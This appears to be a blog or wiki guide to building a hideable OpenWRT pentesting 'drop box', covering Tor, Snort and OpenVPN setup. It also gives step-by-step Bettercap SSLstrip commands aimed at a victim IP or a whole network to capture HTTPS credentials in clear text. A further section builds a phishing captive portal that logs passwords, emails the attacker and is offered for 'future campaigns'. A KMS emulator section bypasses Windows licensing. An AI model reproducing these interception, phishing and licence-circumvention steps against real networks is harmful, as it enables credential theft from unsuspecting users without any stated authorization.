Lan-Dropbox – Pentesting “drop box”

See GITHUB WIKI for full information and instructions!

I was looking for a wireless access point with some network functions for home.
I found this Chinese model at a good price in which OpenWRT and some security tools can be installed.
  
Defined as penetration testing “drop box”. Multiple functions.

Key Features:
  Integrated Wired and Wireless connections + 4GB storage
  Can establish an SSH tunnel through the target network, or can be accessed by wifi
  Can be configured as a wifi sniffer and logger (Wardriving)
  Network Intrusion Prevention System (NIPS) and Network Intrusion Detection System (NIDS)
  Low power consumption, no need to find a power outlet during the pen test
  Multiple PenTesting Tools included:
  (tcpdump, nbtscan, netcat, nmap, kismet, karma, snort, aircrack-ng, ettercap-ng, 
  reaver, WEP cracker, MDK3, Password & Network Sniffer, Wifi Nuke..) to name a few
  Can be easily carried in a pocket, hidden anywhere..
  
Use Cases:
  War Walking / wireless auditing (5v 1.2a battery micro-usb conector)
  Penetration testing drop box
  Anonymizing middlebox (Tor Proxy)
  Phishing with captive portals (Evil Twin)
  Man In The Middle (MITM) SSL Proxy (Rogue AP)
  OpenVPN client
  Windows Key Management Server (KMS Emulated Server)
  Pivot box (reverse connection via SSH or OpenVPN)
  Personal Portable Security Systems (NIPS - NIDS)
  General network auditing, recon..

  Setup
   1 - Install OpenWRT
   2 - Tor proxy and anonymizing setup

  Tools
   3 - Analyzing with "Remote Wireshark Listener"
   4 - Capacitive portal
   5 - KMS Server
   6 - SWORD proyect
   7 - Snort 
   8 - OpenVPN

  https://technet.microsoft.com/en-us/library/ff793434.aspx
  https://wiki.openwrt.org/doc/howto/extroot              
  http://www.rationallyparanoid.com/articles/tcpdump.html 
  https://www.bettercap.org/legacy/ 
  https://forums.mydigitallife.net/threads/emulated-kms-servers-on-non-windows-platforms.50234/
  https://github.com/tomacwrt/tomacwrt.github.io
  https://wiki.openwrt.org/doc/howto/snort
  KMS - cokebar

Installing OpenWRT

Why OpenWRT.. List of cool things that you could do with OpenWrt, aside from having it function as a router:

SSH Server for SSH Tunneling, VPN, BitTorrent Client, run Server Software (web server, IRC server, BitTorrent tracker..), perform Traffic-Shaping and QoS, create a Guest Network, capture and Analyze Network Traffic.. etc

In this case, also:

Tor anonymizing proxy, KMS Authenticating Server, Phishing captive portals, Intrusion detection/prevention systems…

First of all go check if there is firmware for this device on the official site.

Look for the exact model

Download it

Firmware for this device

Fabric default interface:

New OpenWRT interface: 

Set password and recommend changing the ip range by default 192.168.1.1 by 192.168.X.X so as not to cause conflict.

Lan configuration
Ip configuration

Activate ssh connection by lan, save and restart

Ssh connection

Connect by ssh to 192.168.X.X with user:

root // password_selected

A – Copy the OpenWrt’s root filesystem onto an external USB flash drive:

opkg update
opkg install block-mount
opkg install fdisk

B – Activate USB support and ext4 file system

opkg install kmod-usb-storage
opkg install kmod-fs-ext4
opkg install e2fsprogs
fdisk -l

C – Delete partition and create a new one

fdisk /dev/sda

[email protected]:~# fdisk /dev/sda
Command (m for help): d
Selected partition 1
Partition 1 has been deleted.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

Create the new partition, 
[email protected]:~# fdisk /dev/sda

Welcome to fdisk (util-linux 2.25.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Command (m for help): n
Partition type
 p primary (0 primary, 0 extended, 4 free)
 e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 
First sector (2048-61489151, default 2048): 
Last sector, +sectors or +size{K,M,G,T,P} (2048-61489151, default 61489151):

Created a new partition 1 of type 'Linux' and of size 29.3 GiB.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

D – Format the drive to ex4.

mkfs.ext4 /dev/sda1

E – Create a mount point and mount the partition you just created.

mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1

F – Copy the current file system to the USB stick partition.

mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot -cvf - . | tar -C /mnt/sda1 -xf -
umount /tmp/cproot

G – Install nano

opkg install nano

H – Next use fstab to mount the USB drive when it boots up and use it as root

block detect > /etc/config/fstab (create the initial /etc/config/fstab if not exist) or 
nano /etc/config/fstab

I – Add the following to the text file.

config 'mount'
 option target /
 option device /dev/sda1
 option fstype ext4
 option options rw,sync
 option enabled 1
 option enabled_fsck 0

J – Reboot and test.

So far, ap with OpenWRT and 4GB of space for tools, captures … and also add anonymity with tor.

Tor Proxy

A – Login to the router via ssh, and take backup of all related configuration files, change the ssh IP according to your setup.

ssh [email protected]
cp /etc/config/network  /etc/config/network.bac
cp /etc/config/dhcp     /etc/config/dhcp.bac
cp /etc/config/firewall /etc/config/firewall.bac
cp /etc/config/wireless /etc/config/wireless.bac

B – Edit /etc/config/network and add a new network interface wifi

config interface   'wifi'
    option proto   'static'
    option ipaddr  '192.168.2.1'
    option netmask '255.255.255.0'

C – Edit /etc/config/dhcp and create new DHCP pool for the wifi interface

config dhcp 'wifi'
    option interface    'wifi'
    option start        '100'    
    option limit        '150'    
    option leasetime    '12h' 

D – Edit /etc/config/firewall and create a new firewall zone wifi and setup forwarding rules

config zone
    option name    'wifi'
    option input   'ACCEPT'
    option output  'ACCEPT'
    option forward 'REJECT'
    option network 'wifi'

config forwarding
    option src     'wifi'
    option dest    'wan' 

config forwarding
    option src     'wan'
    option dest    'wifi'

E – Edit /etc/config/wireless to modify the existing Wi-Fi hotspot setup, change the option network to wifi from lan in the wifi-iface section.

config wifi-device    'radio0'
    option type       'mac80211'
    option hwmode     '11g'
    option path       'platform/ar933x_wmac'
    option htmode     'HT20'
    option channel    '1'
    option country    'IN'
    option txpower    '20'

config wifi-iface
    option device     'radio0'
    option ssid       'TorAP'
    option mode       'ap'
    option network    'wifi'
    option disabled   '0'
    option encryption 'psk2'
    option key        '2GardeniasParaTi'

F – Bring up the wifi network interface and restart dnsmasq and network service.

ifup wifi
/etc/init.d/dnsmasq  restart
/etc/init.d/network  restart

OpenWrt tor setup

G – Install Tor

opkg update
opkg install tor

H – I store the Tor related data in the /etc/tor/data folder instead of /var/lib/tor

mkdir -p /etc/tor/data

I – Backup

cp /etc/tor/torrc /etc/tor/torrc.bac

J – Create a new Tor config file

nano /etc/tor/torrc

K – Configuration:

DataDirectory /etc/tor/data/
Log notice file /etc/tor/data/notices.log

AllowUnverifiedNodes middle,rendezvous
VirtualAddrNetworkIPv4 10.192.0.0/11
AutomapHostsSuffixes .onion,.exit
AutomapHostsOnResolve 1

TransPort 9040
TransListenAddress 192.168.2.1

DNSPort 9053
DNSListenAddress 192.168.2.1

SocksPort 9050
SocksBindAddress 192.168.2.1:9050
SocksBindAddress 192.168.1.1:9050

L – Tor start:

/etc/init.d/tor start

M – Monitor the Tor log data

tail -f /etc/tor/data/notices.log (create first archive if dont exist)

edit Tor init script, /etc/init.d/tor to successfully start tor at every boot. I’ve to add some delay before starting the main tor process. Add sleep 30 before the procd_open_instance line close to the end of /etc/init.d/tor file.

N – Firewall rules to forward all internet traffic through Tor network

Add iptables rules to forward all traffic from wlan0 interface through Tor network.

O – Edit /etc/firewall.user file:

tor_rules() {
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 9050 -j REDIRECT --to-ports 9050
iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 9053
iptables -t nat -A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040
}
tor_rules

P – Restart the firewall service to take the changes effect.

/etc/init.d/firewall restart

This rules wouldn’t redirect ssh and SOCKS proxy requests from any device connected through WiFi .

Q – Avoiding issues due to low RAM

Adding a swap space will improve the scenario to a great extent, 8-16 MB of swap space is fine, it never consumes more than 2-3 MB of swap space. To add swap space, it may used a dedicated swap partition or simply create a swap file and use it.

dd if=/dev/zero of=/swap_file bs=1M count=32
mkswap /swap_file
echo 95 > /proc/sys/vm/swappiness
swapon /swap_file

R – To make it permanent add vm.swappiness=95 to the /etc/sysctl.conf file.

echo 'vm.swappiness=95' >>  /etc/sysctl.conf

Add swapon /swap_file to /etc/rc.local before the exit 0 line, that’s all. Here’s how you can check memory usage after activating the swap.

S – Test the OpenWrt Tor transparent proxy and auto forwarding

Connect a device to the new Wi-Fi hotspot, the connected device should receive a IP address in the 192.168.2.0/24 range. Check if Tor working or not, open up https://check.torproject.org/ in a browser to verify.

For check your public IP

wget -cq http://ident.me -O -

In firefox proxy configuration is pretty simple, open Edit > Preferences > Advanced > Network > Connection > Settings from the menu bar. Then choose Manual proxy configuration set SOCKS host to 192.168.2.1 and Port 9050 and SOCKS v5 and must check the Remote DNS option. A screenshot bellow, 

Analyzing communications

Tcpdump is a tool for command line whose main utility is to analyze the traffic that circulates through the network. It allows the user to capture and display in real time the packets transmitted and received by the network to which the computer is connected.

Bettercap is the ‘Swiss Army knife’ for 802.11, BLE and Ethernet networks reconnaissance and attacks.

A – SSH on the router with OpenWrt installed (port 22) and install iptables-mod-tee with the following command:

opkg update
opkg install iptables-mod-tee

B – Run the following iptables command to «redirect copy of each IP-packet (-s) from the interface (-o) to the ap-IP (-gateway)»

iptables -A POSTROUTING -t mangle -o br-lan ! -s 192.168.9.121 -j TEE --gateway 192.168.9.183

C – Run the following command to «redirect copy of each packet by-IP (-d) from the interface (-o) to ap-IP (-gateway)»

iptables -A PREROUTING -t mangle -i br-lan ! -d 192.168.9.121 -j TEE --gateway 192.168.9.183

D – Capture traffic in Wireshark with the following filter applied:

(ip.src == 192.168.9.121) || (ip.dst == 192.168.9.121)

Capturing communication with tcpdump:

E – SSH on the router and install «tcpdump» with the following command:

opkg update
opkg install tcpdump

F – Execute the following command to listen in the interface (-i) and save the information captured in a file (-w) and with details while doing it (-v).

tcpdump -i any -v -w pcap.cap

Open the pcap.cap file with Wireshark for further analysis.

Obtain HTTPS credentials with Bettercap and SSLstrip

G – Installation of dependencies

apt-get install build-essential ruby-dev libpcap-dev

H – Clone the repository

git clone https://github.com/evilsocket/bettercap

I – Position ourselves in the project folder

cd bettercap

J – Build the gems.

gem build bettercap.gemspec

K – Install the gems

gem install bettercap*.gem

L – Open a terminal and write:

bettercap

We should see all devices connected to our network, IP 192.168.100.251. 

bettercap -T [IP VÍCTIMA] --proxy -P POST

In my case it would be as follows: bettercap -T 192.168.100.251 -proxy -P POST

If we want the attack to be made to the entire network, we simply do not specify the IP of the victim, and it will start to capture all the network traffic.

bettercap -T --proxy -P POST

Watch POC on Youtube:

Once the victim accesses any https page (in this case Facebook). 

We can see the deciphered traffic, and therefore, the credentials in clear text. 

Captive portal

EditNew Pagepollonegro edited this page on 11 May 2018 · 4 revisions

An Captive portal is a ‘Rogue Access Point’ defined as: ‘is a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.’

The intention is to deceive the user and capture their credentials.

Prerequisites: Preparing router:

Install NoDogSplash through SSh

opkg upgrade
opkg install nodogsplash
uci set [email protected][0].enabled=1
uci commit
/etc/init.d/nodogsplash start
/etc/init.d/nodogsplash enable

Trough web interface go to: Network > Wifi > Add

Wifi interface
Wifi config

Finally Save & Apply and reboot

Edit /etc/nodogsplash/htdocs/splash.html (Main page of captive portal)

Check all with: ndsctl status

Must return something similar to the following:

==================
NoDogSplash Status
====
Version: 0.9_beta9.9.9
Uptime: 0d 0h 0m 12s
Gateway Name: OpenWrt Nodogsplash
Managed interface: br-lan
Managed IP range: 0.0.0.0/0
Server listening: 192.168.13.1:2050
Splashpage: /etc/nodogsplash/htdocs/splash.html
Traffic control: no
Total download: 4 kByte; avg: 3.12533 kbit/s
Total upload: 8 kByte; avg: 5.822 kbit/s
====
Client authentications since start: 0
Current clients: 0
====
Blocked MAC addresses: none
Allowed MAC addresses: N/A
Trusted MAC addresses: none
========

A – Install PHP

Since the NoDogSplash server is not compatible with PHP, this allows me to use PHP with the default OpenWRT uHTTPd server without installing another independent web server. Installing PHP is easy through SSH with the command

opkg install php5 php5-cgi

If this does not work, make sure you have the line src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/ in your /etc/opkg.config file and update the list of packages.

In /etc/config/uhttpd, add the interpreter of the line list interpreter '.php=/usr/bin/php-cgi' to the main section.

B – Set up the welcome page and capture the credentials

We want to create a specific presentation page for our target environment in an attempt to trick users into sending their credentials. We could also try to run malicious JavaScript or serve a malicious file such as an executable file, a browser extension or PDF.

To capture the credentials sent, I use the following codes for the login form (snippet):

Main portal redirection:

Main portal

Collecting data:

Password caption php

Writing to archive:

Gmail redirection

In one hand… This page is served from the NoDogSplash server (/etc/nodegsplash/htdocs/) using port 2050. After a user enters their credentials and sends them, location redirects the user to gmail.com. As an example, I want to store the credentials in the router and send me an email to notify me once the credentials have been captured.

On the other hand… It has been implemented online to cover the possibility of future campaigns of physing:

Capacitive Portal online

C – To send an alert by email, install msmtp on the router by executing the command:

opkg install msmtp 

D – Once installed, edit the configuration file /etc/msmtprc to include mail host information:

The php.ini file must be edited to include the sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc line.

The following code in capture.php to send an alert by email with certain information about the client and redirect them to a fake error page:

$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];

The final result is an email alert and the credentials that are stored in a local file on the router (or in my case, hosted on the ftp server):

KMS Server

EditNew Pagepollonegro edited this page on 23 May 2018 · 6 revisions

Windows Server: Using the Key Management Service (KMS) for Activation of Volume-Licensed Systems

A – Install: (In OpenWRT shell)

opkg install wget (if not installed)
opkg update

(Transfer files by SCP, from linux console):
scp luci-app-vlmcsd_1.0.2-1_all.ipk [email protected]:/tmp/
scp vlmcsd_svn1111-1_ramips_24kec.ipk [email protected]:/tmp/

(By ssh in OpenWRT):
cd /tmp
opkg install vlmcsd_svn1111-1_ramips_24kec.ipk 
opkg install luci-app-vlmcsd_1.0.2-1_all.ipk 
opkg update
Menu Kms

B – Check if the automatic activation is configured correctly: (In windows client shell)

nslookup -type=srv _vlmcs._tcp.lan
nslookup

C – Establish key management service: (In windows client shell)

slmgr -skms 192.168.13.1
slmgr

D – Activate: (In windows client shell)

slmgr -ato 
Activation

SWORD Project

S.W.O.R.D is a web based UI for OpenWRT including common pentest tools: URLSnarf, Ettercap, tcpdump , nmap, etc.

Pros:
User Friendly Interface
Speed
Runs on phone

Cons:
Limited Tools
Can’t launch Wi-Fi Attacks (while usb is used as storage)

Instructions:

Extract these files in /www directory

Make sure you have bash installed otherwise the scripts wont work 
(opkg update; opkg install bash –force-depends)‏

give 655 to the /cgi-bin directory (chmod -R 655 /www/cgi-bin/*

navigate to  “192.168.13.1/SWORD” 

System Information: 

Web Interface and utils: 

Snort IDS IPS

Is a free and open source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS)

OpenWRT Snort Official Instructions

Install:

opkg update 
opkg install snort

#Choose interface and config file
vi /etc/config/snort 

#Setup snort config file
vi /etc/snort/snort.conf 

#Run snort at startup
/etc/init.d/snort enable 

#Start snort now
/etc/init.d/snort start 

As of 03/03/2016 this will only install snort and run it without the installed config. In order to start with the config you must edit the /etc/init.d/snort file.

procd_set_param command $PROG "-q" "--daq-dir" "/usr/lib/daq/" "-i" "$interface" "-s" "-N"

with

procd_set_param command $PROG "-c" "$config_file" "-q" "--daq-dir" "/usr/lib/daq/" "-i" "$interface" "-s" "-N"

Configuration:

snort -c "snort.conf" -i "lo" --daq-dir /usr/lib/daq

Start:

/etc/init.d/snort start
start service

snort -i vlan1 &

[email protected]:~# Running in IDS mode with inferred config file: /etc/snort/snort.conf

Initializing Network Interface vlan1

        --== Initializing Snort ==--
Initializing Output Plugins!
Decoding Ethernet on interface vlan1
Initializing Preprocessors!
Initializing Plug-ins!
Parsing Rules file /etc/snort/snort.conf

+++++++++++++++++++++++++++++++++++++++++++++++++++
Initializing rule chains...
,-----------[Flow Config]----------------------
| Stats Interval:  0
| Hash Method:     2
| Memcap:          10485760
| Rows  :          4099
| Overhead Bytes:  16400(%0.16)
`----------------------------------------------
No arguments to frag2 directive, setting defaults to:
    Fragment timeout: 60 seconds
    Fragment memory cap: 4194304 bytes
    Fragment min_ttl:   0
    Fragment ttl_limit: 5
    Fragment Problems: 0
    Self preservation threshold: 500
    Self preservation period: 90
    Suspend threshold: 1000
    Suspend period: 30
Stream4 config:
    Stateful inspection: ACTIVE
    Session statistics: INACTIVE
    Session timeout: 30 seconds
    Session memory cap: 8388608 bytes
    State alerts: INACTIVE
    Evasion alerts: INACTIVE
    Scan alerts: INACTIVE
    Log Flushed Streams: INACTIVE
    MinTTL: 1
    TTL Limit: 5
    Async Link: 0
    State Protection: 0
    Self preservation threshold: 50
    Self preservation period: 90
    Suspend threshold: 200
    Suspend period: 30
    Enforce TCP State: INACTIVE
    Midstream Drop Alerts: INACTIVE

Stream4_reassemble config:
    Server reassembly: INACTIVE
    Client reassembly: ACTIVE
    Reassembler alerts: ACTIVE
    Zero out flushed packets: INACTIVE
    flush_data_diff_size: 500
    Ports: 21 23 25 53 80 110 111 143 513 1433
    Emergency Ports: 21 23 25 53 80 110 111 143 513 1433
X-Link2State Config:
    Ports: 25 691
112 Snort rules read...
112 Option Chains linked into 57 Chain Headers
0 Dynamic rules
+++++++++++++++++++++++++++++++++++++++++++++++++++

Warning: flowbits key 'tls1.client_hello.request' is checked but not ever set.
Warning: flowbits key 'sslv3.client_hello.request' is checked but not ever set.

+-----------------------[thresholding-config]----------------------------------
| memory-cap : 1048576 bytes
+-----------------------[thresholding-global]----------------------------------
| none
+-----------------------[thresholding-local]-----------------------------------
| none
+-----------------------[suppression]------------------------------------------
| none
+------------------------------------------------------------------------------
Rule application order: ->activation->dynamic->alert->pass->log
Log directory = /var/log/snort

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.3.3 (Build 14)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2004 Sourcefire Inc., et al.
To make sure Snort was logging to the remote machine, I checked the syslog 
there and found these two new entries in /var/log/syslog:

Mar  2 15:40:44 192.168.13.1 kernel: vlan1: dev_set_promiscuity(master, 1)
Mar  2 15:40:44 192.168.13.1 kernel: device vlan1 entered promiscuous mode

OpenVPN

The OpenVPN server running on your router can provide a secure connection back to your home network while you’re away. If you need to access the router itself or any of your home network devices from afar, the OpenVPN server is a great and secure solution. This article provides a concise and correct procedure for setting up an OpenVPN server on your router.

1 – Install OpenVPN and other required packages to your router.

2 – Generate certificates necessary for both OpenVPN Server running on your router and the OpenVPN Client running on the (remote) client device you will be connecting from.

3 – Edit configuration files on your router to enable OpenVPN Server.

4 – Generate an .ovpn file for client devices.

5 – Copy an .ovpn file from your router to your clients.

Previous backup:

backups

Install OpenVPN and Other Packages

SSH into your router and run:

opkg update && opkg install openvpn-openssl openssl-util luci-app-openvpn
Install
Install

Edit Configuration Files

create-certs.sh

create-certs.sh

#!/bin/sh
 
printf "\n\n  # Creating Directory Structure #\n\n"
printf %b "------------------------------------------------------------\n"
 
  PKI_DIR="/etc/openvpn/ssl"
 
    [ -d ${PKI_DIR} ] && rm -rf ${PKI_DIR}
      mkdir -p ${PKI_DIR} && chmod -R 0600 ${PKI_DIR}
      cd ${PKI_DIR}
 
    touch index.txt && touch index && echo 1000 > serial
    cp /etc/ssl/openssl.cnf ${PKI_DIR}
 
printf "\n\n  # Customizing openssl.cnf #\n\n"
printf %b "------------------------------------------------------------\n\n"
 
  PKI_CNF=${PKI_DIR}/openssl.cnf
 
    sed -i '/^dir/   s:=.*:= /etc/openvpn/ssl:'                ${PKI_CNF}
    sed -i '/^new_certs_dir/   s:=.*:= /etc/openvpn/ssl:'      ${PKI_CNF}
    sed -i '/.*Name/ s:= match:= optional:'                    ${PKI_CNF}
    sed -i '/organizationName_default/    s:= .*:= WWW Ltd.:'  ${PKI_CNF}
    sed -i '/stateOrProvinceName_default/ s:= .*:= London:'    ${PKI_CNF}
    sed -i '/countryName_default/         s:= .*:= GB:'        ${PKI_CNF}
    sed -i '/default_days/   s:=.*:= 3650:'                    ${PKI_CNF}
    sed -i '/default_bits/   s:=.*:= 4096:'                    ${PKI_CNF}
 
    cat >> ${PKI_CNF} <<"EOF"
[ my-server ] 
  keyUsage = digitalSignature, keyEncipherment
  extendedKeyUsage = serverAuth
 
[ my-client ] 
  keyUsage = digitalSignature
  extendedKeyUsage = clientAuth
EOF
 
printf "\n\n  # Generating Server PSK and CA, Server, & Client Certs #\n\n"
printf %b "------------------------------------------------------------\n"
 
  printf "\n\n  ...Generating Certifcate Authority Cert & Key...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl req -batch -nodes -new -keyout "ca.key" -out "ca.crt" -x509 -config ${PKI_CNF} -days 3650
 
  printf "\n\n  ...Generating Server Cert & Key...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl req -batch -nodes -new -keyout "my-server.key" -out "my-server.csr" -subj "/CN=my-server" -config ${PKI_CNF}
 
  printf "\n\n  ...Signing Server Cert...\n\n"
    openssl ca  -batch -keyfile "ca.key" -cert "ca.crt" -in "my-server.csr" -out "my-server.crt" -config ${PKI_CNF} -extensions my-server
 
  printf "\n\n  ...Generating Client Cert & Key...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl req -batch -nodes -new -keyout "my-client.key" -out "my-client.csr" -subj "/CN=my-client" -config ${PKI_CNF}
 
  printf "\n\n  ...Signing Client Cert...\n"
  printf %b "------------------------------------------------------------\n\n"
    openssl ca  -batch -keyfile "ca.key" -cert "ca.crt" -in "my-client.csr" -out "my-client.crt" -config ${PKI_CNF} -extensions my-client     
 
  printf "\n\n  ...Generating OpenVPN TLS PSK...\n"
  printf %b "------------------------------------------------------------\n\n"
    openvpn --genkey --secret tls-auth.key
 
  printf "\n  ...Generating Diffie-Hellman Cert...\n"
  printf %b "------------------------------------------------------------\n\n"
    printf "    # May take a while to complete (~25m on WRT3200ACM) #\n\n\n"
    openssl dhparam -out dh2048.pem 2048
 
printf "\n\n  ...Correcting Permissions...\n"
printf %b "------------------------------------------------------------\n"
  chmod 0600 ca.key dh2048.pem my-server.key my-client.key tls-auth.key
 
printf "\n\n  # Copying Certs & Keys to /etc/openvpn/ #\n"
printf %b "------------------------------------------------------------\n"
  cp ca.crt my-server.* my-client.* dh2048.pem tls-auth.key /etc/openvpn
 
printf "\n\n  . . .  DONE  . . .  \n\n\n"

create-configs.sh

create-configs.sh

#!/bin/sh
 
# Modify /etc/config/network
  uci set network.vpnserver='interface'
  uci set network.vpnserver.proto='none'
  uci set network.vpnserver.ifname='ovpns0'
  uci set network.vpnserver.auto='1'
uci commit network
 
# Modify /etc/config/firewall
  uci add firewall rule
  uci set [email protected][-1].name='Allow-OpenVPN-Inbound'
  uci set [email protected][-1].target='ACCEPT'
  uci set [email protected][-1].src='*'
  uci set [email protected][-1].proto='tcpudp'
  uci set [email protected][-1].dest_port='1194'
 
  uci add firewall zone
  uci set [email protected][-1].name='vpnserver'
  uci set [email protected][-1].input='ACCEPT'
  uci set [email protected][-1].forward='REJECT'
  uci set [email protected][-1].output='ACCEPT'
  uci set [email protected][-1].masq='1'
  uci set [email protected][-1].network='vpnserver'
 
  uci add firewall forwarding
  uci set [email protected][-1].src='vpnserver'
  uci set [email protected][-1].dest='wan'
 
  uci add firewall forwarding
  uci set [email protected][-1].src='vpnserver'
  uci set [email protected][-1].dest='lan'
uci commit firewall
 
# Modify /etc/config/openvpn
  uci set openvpn.vpnserver='openvpn'
  uci set openvpn.vpnserver.enabled='1'
  uci set openvpn.vpnserver.dev_type='tun'
  uci set openvpn.vpnserver.dev='ovpns0'
  uci set openvpn.vpnserver.port='1194'
  uci set openvpn.vpnserver.proto='udp'
  uci set openvpn.vpnserver.comp_lzo='yes'
  uci set openvpn.vpnserver.keepalive='10 120'
  uci set openvpn.vpnserver.persist_key='1'
  uci set openvpn.vpnserver.persist_tun='1'
  uci set openvpn.vpnserver.ca='/etc/openvpn/ca.crt'
  uci set openvpn.vpnserver.cert='/etc/openvpn/my-server.crt'
  uci set openvpn.vpnserver.key='/etc/openvpn/my-server.key'
  uci set openvpn.vpnserver.dh='/etc/openvpn/dh2048.pem'
  uci set openvpn.vpnserver.tls_auth='/etc/openvpn/tls-auth.key 0'
  uci set openvpn.vpnserver.mode='server'
  uci set openvpn.vpnserver.tls_server='1'
  uci set openvpn.vpnserver.server='192.168.200.0 255.255.255.0'
  uci set openvpn.vpnserver.topology='subnet'
  uci set openvpn.vpnserver.route_gateway='dhcp'
  uci set openvpn.vpnserver.client_to_client='1'
 
  uci add_list openvpn.vpnserver.push='comp-lzo yes'
  uci add_list openvpn.vpnserver.push='persist-key'
  uci add_list openvpn.vpnserver.push='persist-tun'
  uci add_list openvpn.vpnserver.push='topology subnet'
  uci add_list openvpn.vpnserver.push='route-gateway dhcp'
  uci add_list openvpn.vpnserver.push='redirect-gateway def1'
  uci add_list openvpn.vpnserver.push='route 192.168.200.0 255.255.255.0'
  uci add_list openvpn.vpnserver.push='dhcp-option DNS 192.168.1.1'
uci commit openvpn

Generate Certificates

cd /tmp && wget https://openwrt.org/_export/code/docs/guide-user/services/vpn/openvpn/server.setup?codeblock=3
 
mv server.setup?codeblock=3 create-certs.sh && chmod 754 ./create-certs.sh && ./create-certs.sh
Install
Install
Install

Server – Enable & Start

/etc/init.d/openvpn enable && /etc/init.d/openvpn start

Verify if the OpenVPN Server has successfully started by running:

 ps | grep "[o]penvpn(vpnserver)"

Clients – Generate .ovpn

Your OpenVPN Client will need an .ovpn-file to connect to your OpenVPN server. This section generates a my-server.ovpn file on your router so you can later copy it to your client devices.

To connect to your router remotely (from the internet) you will need to know the router’s IP address or DNS name.

If you have a static IP from your ISP, copy/paste the script below as-is into your router. If your ISP assigns a dynamic IP, you will need to use a DDNS Client service, then uncomment the wanIP=“dynamic.dns.name” line, replacing dynamic.dns.name with your router’s Dynamic DNS name.

dinamic dns

Copy-paste the following commands into your router via the SSH session:

create-ovpn.sh

create-ovpn.sh

#!/bin/sh
 
source /lib/functions/network.sh
network_find_wan wanIf
network_get_ipaddrs wanIP $wanIf
# wanIP="dynamic.dns.name"
 
OVPN_FILE="/etc/openvpn/my-server.ovpn"
 
cat >> ${OVPN_FILE} <<EOF
  client
  dev tun
  proto udp
  fast-io
  remote $wanIP 1194
  remote-cert-tls server
  nobind
  persist-key
  persist-tun
  comp-lzo no
  verb 3
  key-direction 1
EOF
 
echo '<ca>'    >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/ca.crt        
echo '</ca>'   >> ${OVPN_FILE}
 
echo '<cert>'  >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/my-client.crt 
echo '</cert>' >> ${OVPN_FILE}
 
echo '<key>'   >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/my-client.key 
echo '</key>'  >> ${OVPN_FILE}
 
echo '<tls-auth>'   >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/tls-auth.key 
echo '</tls-auth>'  >> ${OVPN_FILE}
 
# Display the generated OVPN_FILE
  printf "----- Generated .ovpn file ------\n\n"
  cat ${OVPN_FILE}
 
printf "\n\n\n  . . .  DONE  . . .  \n\n\n"
vpncreate
vpncreate
vpncreate
vpncreate
vpncreate

copy-certs.sh

copy-certs.sh
#!/bin/sh
 
echo /etc/openvpn/ca.crt       > /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/my-server.* >> /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/my-client.* >> /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/dh2048.pem  >> /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/tls-auth.*  >> /lib/upgrade/keep.d/openvpnserver

Download certs and upload by scp:

scp ovpn scripts

Permissions:

chmod

VPN Service Working:

status vpn
vpnserver-luci
enable start
process

Download certificate por future client installation:

cert

INST. SOURCE

Deja un comentario